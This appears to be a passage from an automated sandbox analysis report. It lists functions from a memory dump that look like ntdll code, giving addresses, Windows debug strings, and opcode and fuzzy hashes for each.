                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: b93009c498754632d97769579c537e994e28dbfbd7f32cbcc75e5bc44925ef1a
                                                • Instruction ID: 4394b2bc879654a90ed77f0303dc027bf2b5a3f86bcb7d36cfdcda7eed15a3f3
                                                • Opcode Fuzzy Hash: b93009c498754632d97769579c537e994e28dbfbd7f32cbcc75e5bc44925ef1a
                                                • Instruction Fuzzy Hash: B751E1326007469BEB21CB6DC994B6ABBE4AB01B1CF0405AEED559B7E5D730ED00CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014623E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                Download Yara Rule
                                                Strings
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0146256F
                                                • HEAP: , xrefs: 0146255C
                                                • HEAP[%wZ]: , xrefs: 0146254F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                • Opcode ID: fafc52967e074c5dff5cbc923ec9fab715811cd0729385ae75577492b76cc7bb
                                                • Instruction ID: 81ff2bcf1427b4a41e1eff7126306888f583be9b8f5ead65373c942e42b8a1c3
                                                • Opcode Fuzzy Hash: fafc52967e074c5dff5cbc923ec9fab715811cd0729385ae75577492b76cc7bb
                                                • Instruction Fuzzy Hash: B5514934100260AAE374CE1EC844F727BF9DB4424CF45486BE9C28B7A5D6B5D843DB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013BE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                Download Yara Rule
                                                Strings
                                                • InstallLanguageFallback, xrefs: 013BE6DB
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 013BE68C
                                                • @, xrefs: 013BE6C0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1757540487
                                                • Opcode ID: 6da4d3ee3941bc005e5cb15b24824fd8b72ab753118cc87652b84f37c607b484
                                                • Instruction ID: db7f74533f85c20d8d1841ec132daa9e2d321ae620ba578efbc208f08351d66a
                                                • Opcode Fuzzy Hash: 6da4d3ee3941bc005e5cb15b24824fd8b72ab753118cc87652b84f37c607b484
                                                • Instruction Fuzzy Hash: F25192766043469BD710DF68C480BEBB7E8AF89618F05093EFA85DB654F734D904C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DEB9A, Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 014242BA
                                                • HEAP: , xrefs: 014242AF
                                                • HEAP[%wZ]: , xrefs: 014242A2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                • API String ID: 0-1596344177
                                                • Opcode ID: 8dd8a3d36d34d7ae784c7dfab7f2631c3e1959352a7aec987ad7041b62741624
                                                • Instruction ID: b39aecab1a3dfc83086ebafd7182b7b51d5539af46cdb33c3b891eabeacc4928
                                                • Opcode Fuzzy Hash: 8dd8a3d36d34d7ae784c7dfab7f2631c3e1959352a7aec987ad7041b62741624
                                                • Instruction Fuzzy Hash: FC510072A00529EFCB14DF59D484B6ABBB5FF85308F1981A9D8059F742D731AC42CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: a0ae6245d591902d183e5344d188321ddbe3d5bba689d032384dda4e337efc3e
                                                • Instruction ID: fbaf97df51dc09400636c3a2087754fc4615b15c914423a3aaa81828712145af
                                                • Opcode Fuzzy Hash: a0ae6245d591902d183e5344d188321ddbe3d5bba689d032384dda4e337efc3e
                                                • Instruction Fuzzy Hash: 7A115B323041428FEB29D71AE485F3AFBA9EF4162CF16802EE046CB359EB70D884C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0147E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction ID: 5ab8628fb2abde6e5640905e3be9b09cfd28b8c34b046078bcc215de3c5235db
                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction Fuzzy Hash: 7A91B5312043429FE724CF29C941B9BBBE5BF84714F148A6EF699DB2A0E774E904CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014351BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: c0c0bae463edd0d29ba880bac9d87835457d183f6c2807469db23accb1a09155
                                                • Instruction ID: f615562d947df6a3af8a274295a276c133b14dd5ebc5f3137c36fefcb1a378f6
                                                • Opcode Fuzzy Hash: c0c0bae463edd0d29ba880bac9d87835457d183f6c2807469db23accb1a09155
                                                • Instruction Fuzzy Hash: 185150B1E046099FDB15DFA9C980BAEBBF8FF98704F14402EE649EF261D6719901CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013BB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: _vswprintf_s
                                                • String ID:
                                                • API String ID: 677850445-0
                                                • Opcode ID: 787e0d56ed16b23371c695fbc2bfc0cd251735817de2ed2f6629c68aa5b520f0
                                                • Instruction ID: 17ff6546efe9bfbe16c771642fe6382f7c59e76e4eedc5e1adbb50f2d9bf4342
                                                • Opcode Fuzzy Hash: 787e0d56ed16b23371c695fbc2bfc0cd251735817de2ed2f6629c68aa5b520f0
                                                • Instruction Fuzzy Hash: 5951F275D1025A8EEB31CF78C844BAEBBB1BF00714F1841AEDD59AB3AAD7704945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013DB9A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: 0b73fdbd18619775f6e33046d04300474abe7c810cc2942e28f431bb91bc30d3
                                                • Instruction ID: 020ec11bc2abb57044610d5dc6ee21f278a8707edb2b9c5fc794e1fafe5190cd
                                                • Opcode Fuzzy Hash: 0b73fdbd18619775f6e33046d04300474abe7c810cc2942e28f431bb91bc30d3
                                                • Instruction Fuzzy Hash: 48515872A08341CFD720CF2DD08092AFBE9FB89648F56496EF68587359D770E844CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013E2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: ceb6ae60a30a3bcc0254c290dfda585b0261919509ab269b2274c876631ba3b8
                                                • Instruction ID: b21eabfcbc5a51ea6039b2fdc0064159e14be0e71c4be94fe4ec97aa5c4ef530
                                                • Opcode Fuzzy Hash: ceb6ae60a30a3bcc0254c290dfda585b0261919509ab269b2274c876631ba3b8
                                                • Instruction Fuzzy Hash: 01C1B271D00329DBDB24DF99D885BAEBBF8FF48758F45402AE901AB390D774A941CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                Download Yara Rule
                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0142BE0F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                • Opcode ID: 0bc2cb4fc1ec5b4312e85ee4f76e82cb37164b84b94af98cfaafd7a546dd0e81
                                                • Instruction ID: 399158ec6d775b013aa407f5eb4e77136940acd6f0016470e5ff87d436e0b485
                                                • Opcode Fuzzy Hash: 0bc2cb4fc1ec5b4312e85ee4f76e82cb37164b84b94af98cfaafd7a546dd0e81
                                                • Instruction Fuzzy Hash: B6A10471B007268BEB25DB6CC458BBAB7E8EF44728F14456EDA06CB7D1DB70D8418B80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                • Opcode ID: 97b1c035617ccca8446d4d63fd0ecf80b6fb53100d9bba3e0dabadb5a78602c2
                                                • Instruction ID: 5b66c77619dd09d7f8b82aeaaabeff7da60a8c288a7991d23cbed8bb33bd48f1
                                                • Opcode Fuzzy Hash: 97b1c035617ccca8446d4d63fd0ecf80b6fb53100d9bba3e0dabadb5a78602c2
                                                • Instruction Fuzzy Hash: C4613871A006059FEB33DF6EC880BBF7BA4EB44318F14027AE615977E1D734A9458B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01480EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 230ff72e9eeb84e8ce2a59ac7d9395654fcfa7d20ff309faf6da2a33b037db4f
                                                • Instruction ID: 8d3db9402ee063ee88acea601d3be4f263358102da70e10a4140090cc295988f
                                                • Opcode Fuzzy Hash: 230ff72e9eeb84e8ce2a59ac7d9395654fcfa7d20ff309faf6da2a33b037db4f
                                                • Instruction Fuzzy Hash: 6A51A0B13043429FE325EF19D890B5FBBE5EBC5704F04492EF696976A0D670E80AC762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction ID: 5768e717f73fe51f926af26d684478e9ee8c4924bcd4588ea1c0b5ae40d798e1
                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction Fuzzy Hash: 54516972504715ABC320DF29C840B6BBBF8FF58714F00892EFA95976A0E7B4E944CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01433540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: d3f913109addf4e1116d0d7a26b0af93f3fc89f57449273ea6e16303ee65ed3f
                                                • Instruction ID: 0d83d613fbc94fe84989ad212d66b9849aa1a22ef0f3d38e159f4f5cf384db61
                                                • Opcode Fuzzy Hash: d3f913109addf4e1116d0d7a26b0af93f3fc89f57449273ea6e16303ee65ed3f
                                                • Instruction Fuzzy Hash: 6B4124B2D0052D9FDB21DE54CC84FDEB77CAB54718F0045AAEB09AB250DB309E898F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014805AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction ID: 2d2f7467898c3cfc52f5b1fd04ee70720acfb1c797ca860bfe20fb74f7ce45e0
                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction Fuzzy Hash: F23106322003066BE720EE29CC44F9B7BD9EBC4758F18412AFA58AB290D770E908C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01433884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 56cddd86c32f57c433653d0bb967b16c05bd7140f91e4691974df11bc824e87c
                                                • Instruction ID: 42e7885cb1256651fb9cb1eb902b84c4b5f54aef3f18c7bfdde9b863972fe1f2
                                                • Opcode Fuzzy Hash: 56cddd86c32f57c433653d0bb967b16c05bd7140f91e4691974df11bc824e87c
                                                • Instruction Fuzzy Hash: 3C31D43290151AEFEB15DE5CC945E7BBB74FF88B24F11416AE915A7360D6309E04CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013ED294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 9654a36cb0d38d930367b3123253709273f1a547392037d4cfa8fd2409405f7f
                                                • Instruction ID: 2cf851b789def27f74db9247094fab87f1e32088c4f569cdfd85b0c17747b7ce
                                                • Opcode Fuzzy Hash: 9654a36cb0d38d930367b3123253709273f1a547392037d4cfa8fd2409405f7f
                                                • Instruction Fuzzy Hash: F831C0B6508315DFC321DF6CD984AABBBE8EB89658F40092EF99483690D634DD05CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction ID: 0592ee5a6fa27101eb1932c09bf646e6e983fa4027898fb3eb232846d3427513
                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction Fuzzy Hash: 7E21CB77601219EBDF21DE5DC880F5BBBADAF41A59F05842AFA049B215D630DD01A7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: c7b41ea9c974a53f44c5ab11630871c996fa651ffcf64025a56e55d1e49bfd90
                                                • Instruction ID: ca2e3143b26527013dcea6e177f0ef694d20bfa9e3dc1e368c805e4cc432a4e1
                                                • Opcode Fuzzy Hash: c7b41ea9c974a53f44c5ab11630871c996fa651ffcf64025a56e55d1e49bfd90
                                                • Instruction Fuzzy Hash: 5011D0373046068BEB254E1CA8D07B6769DEB852ECF27452AE467CBB91DA70C8838340
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01468DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                Strings
                                                • Critical error detected %lx, xrefs: 01468E21
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Critical error detected %lx
                                                • API String ID: 0-802127002
                                                • Opcode ID: aab32fb683d6cd4f0d9b2406bcaad8429f1db4301753a79cf57bc454c51763a4
                                                • Instruction ID: 0b756c72d883ee95842738d4bd3416bef847b15855f658414960da4544ee1fee
                                                • Opcode Fuzzy Hash: aab32fb683d6cd4f0d9b2406bcaad8429f1db4301753a79cf57bc454c51763a4
                                                • Instruction Fuzzy Hash: 48117975D00349DBDF29CFEAC90579DBBB4AB14328F20422EE128AB3A2C3300606CF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0144FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                Strings
                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0144FF60
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                • API String ID: 0-1911121157
                                                • Opcode ID: e300a92aeda708ad22e03e0e9436d788789e8ffe42fc686927013b6244271a02
                                                • Instruction ID: 42bc90af559f21e9cfb81ffd868c9c08d66edbf2a470a4e00edb33c278a70400
                                                • Opcode Fuzzy Hash: e300a92aeda708ad22e03e0e9436d788789e8ffe42fc686927013b6244271a02
                                                • Instruction Fuzzy Hash: F111C071950244EFEF22DB98C959F99BBB1FF18704F55806AF1086B2B1CB399948CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01485BA5, Relevance: .6, Instructions: 592COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2492261637a948ef0acbbad22d4e92333e4c86487a6e5426f83456e1cc7daab1
                                                • Instruction ID: 8bbdde8787e00280c16bbdd58bcb3f0c653a537c6048125461c34604a45da3de
                                                • Opcode Fuzzy Hash: 2492261637a948ef0acbbad22d4e92333e4c86487a6e5426f83456e1cc7daab1
                                                • Instruction Fuzzy Hash: C8423875900229CFDB64DF68C880BAEBBB1FF49304F1581AAD94DAB352E7349985CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013D4120, Relevance: .4, Instructions: 444COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff7c511392a6ffa415fe1f59e6b9120c245740c9ec3ffb561791493281442292
                                                • Instruction ID: ffb97af81f3ed23742408a1bc7756201f9019d11d1f0a47a2b7e84ed95c37454
                                                • Opcode Fuzzy Hash: ff7c511392a6ffa415fe1f59e6b9120c245740c9ec3ffb561791493281442292
                                                • Instruction Fuzzy Hash: 60F18C766082118FC725CF19D480A7AB7F1AF88718F44892EF986DBB60E734D895CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013E20A0, Relevance: .4, Instructions: 420COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 323e051e8d5828c5baf4dee46c639ebbcc6ae2b42af6b35972e4051f64661fe5
                                                • Instruction ID: a572084f7f24790aa4bbd4479efb277c660e93ea85302fd9f1b3d2449cc1649a
                                                • Opcode Fuzzy Hash: 323e051e8d5828c5baf4dee46c639ebbcc6ae2b42af6b35972e4051f64661fe5
                                                • Instruction Fuzzy Hash: A5F127316083229FE726CF2CC44476B7BE9AF85328F48851EE9959B3E1D774D881CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013CD5E0, Relevance: .4, Instructions: 353COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da1b5d76aca51051c460e71aa32d062d2e247d74d23bd7aaa7cbd2838b38c926
                                                • Instruction ID: 5385f2289259a9bbc4f6d42a8829be869c86bddc49212f321b2b066c10686c7e
                                                • Opcode Fuzzy Hash: da1b5d76aca51051c460e71aa32d062d2e247d74d23bd7aaa7cbd2838b38c926
                                                • Instruction Fuzzy Hash: 94E1F331A0035ACFEB31DF68C884B6ABBB5FF45718F0541AEE909576A1D730AD91CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DB236, Relevance: .3, Instructions: 305COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                • Instruction ID: 3eb8fe7dd8fd394e7b699096d8f57a97ef2362bb475b662d668db8acb1e4ebb5
                                                • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                • Instruction Fuzzy Hash: 55B10432B0061A9FDB15CBA9C890B7EBBF9AF85308F55026AE641D7395DBB0D940CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013C849B, Relevance: .3, Instructions: 290COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1c54b2051365ab88be178cb57803a14d459162a428cc218cd42369e23c344b7
                                                • Instruction ID: e176b50d40fe526d052f10ad473f6b9377d36f5de1394055da1831b1138767ac
                                                • Opcode Fuzzy Hash: d1c54b2051365ab88be178cb57803a14d459162a428cc218cd42369e23c344b7
                                                • Instruction Fuzzy Hash: D2B17CB1E00209DFDB25CFA9C980AADBBB9FF48708F10416EE605AB755D770AD45CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013E513A, Relevance: .3, Instructions: 258COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa12071366be1f177a7411a0d5bee41e71eea5e848208d748b91020442f0d2ac
                                                • Instruction ID: 4f48b363e298a5addab4d8b7136ecb7f410c93c0f28466ae631e020718e93898
                                                • Opcode Fuzzy Hash: fa12071366be1f177a7411a0d5bee41e71eea5e848208d748b91020442f0d2ac
                                                • Instruction Fuzzy Hash: 66C133755083818FD354CF28C580A6AFBF1BF88318F54496EF9998B3A2D771E985CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013E03E2, Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb97bc0379606c7dd391847799829f688ac9c0e14164080f2a38d6217b770efd
                                                • Instruction ID: d41a566aa76f2c4340e33f0ac85dce38f6f4e1df59770e8b4b5f2e0f0e6918e4
                                                • Opcode Fuzzy Hash: fb97bc0379606c7dd391847799829f688ac9c0e14164080f2a38d6217b770efd
                                                • Instruction Fuzzy Hash: 0D911C31F043399BEB359A6CC848B6E7BE4EF05728F490266FA50A72E1D7749D41CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013BC600, Relevance: .2, Instructions: 225COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8afa9d35ffc243b1a73574168b470cd1a0e572365fa2e10c7ccf4dc27e8f25ee
                                                • Instruction ID: 87ec07c5b7612ffa5275efb4657fbb068ce553ca9960bbba714e30acfb1fb5b7
                                                • Opcode Fuzzy Hash: 8afa9d35ffc243b1a73574168b470cd1a0e572365fa2e10c7ccf4dc27e8f25ee
                                                • Instruction Fuzzy Hash: 2C8194756043118BDB26CE58C880B6BB7E4FBA4365F94482FEE459B361D330DD81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013E138B, Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                • Instruction ID: e45747c05cd5f3fd21fa4e51aacce74e427c485ee5679ce4646b1e9119e0b1fb
                                                • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                • Instruction Fuzzy Hash: F281AA71A003559FCB24CF68C444BEABBF5EF48304F14856AE956CB791D330EA81CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0144B8D0, Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5996f8378599abab1afdd8534cfc30dce191a06b840803100919e8b87a6df0f5
                                                • Instruction ID: 575338383bfe4e9ed8040610f5ccc50d4efd50716e91bbe8713d4a97432c392b
                                                • Opcode Fuzzy Hash: 5996f8378599abab1afdd8534cfc30dce191a06b840803100919e8b87a6df0f5
                                                • Instruction Fuzzy Hash: 38711E32200B02EFF732CF28C844F66BBA5EB44728F15492AE6559B6B0DB75E941CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01436DC9, Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
